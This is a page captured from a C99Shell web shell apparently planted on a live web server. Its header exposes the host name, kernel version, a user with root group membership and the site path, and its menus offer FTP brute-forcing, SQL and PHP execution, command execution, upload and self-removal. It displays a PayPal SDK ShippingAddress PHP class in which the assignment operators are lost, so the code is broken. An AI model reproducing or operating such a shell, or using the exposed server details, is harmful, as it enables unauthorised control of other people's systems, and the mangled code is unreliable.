!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/vendor/paypal/rest-api-sdk-php/lib/PayPal/Api/   drwxr-xr-x
Free 28.61 GB of 117.98 GB (24.25%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ShippingAddress.php (2.05 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace PayPal\Api;

/**
 * Class ShippingAddress
 *
 * Extended Address object used as shipping address in a payment.
 *
 * @package PayPal\Api
 *
 * @property string id
 * @property string recipient_name
 * @property bool default_address
 * @property bool preferred_address
 */
class ShippingAddress extends Address
{
    
/**
     * Address ID assigned in PayPal system.
     *
     * @param string $id
     *
     * @return $this
     */
    
public function setId($id)
    {
        
$this->id $id;
        return 
$this;
    }

    
/**
     * Address ID assigned in PayPal system.
     *
     * @return string
     */
    
public function getId()
    {
        return 
$this->id;
    }

    
/**
     * Name of the recipient at this address.
     *
     * @param string $recipient_name
     *
     * @return $this
     */
    
public function setRecipientName($recipient_name)
    {
        
$this->recipient_name $recipient_name;
        return 
$this;
    }

    
/**
     * Name of the recipient at this address.
     *
     * @return string
     */
    
public function getRecipientName()
    {
        return 
$this->recipient_name;
    }

    
/**
     * Default shipping address of the Payer.
     *
     * @param bool $default_address
     *
     * @return $this
     */
    
public function setDefaultAddress($default_address)
    {
        
$this->default_address $default_address;
        return 
$this;
    }

    
/**
     * Default shipping address of the Payer.
     *
     * @return bool
     */
    
public function getDefaultAddress()
    {
        return 
$this->default_address;
    }

    
/**
     * Shipping Address marked as preferred by Payer.
     *
     * @param bool $preferred_address
     *
     * @return $this
     */
    
public function setPreferredAddress($preferred_address)
    {
        
$this->preferred_address $preferred_address;
        return 
$this;
    }

    
/**
     * Shipping Address marked as preferred by Payer.
     *
     * @return bool
     */
    
public function getPreferredAddress()
    {
        return 
$this->preferred_address;
    }

}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0041 ]--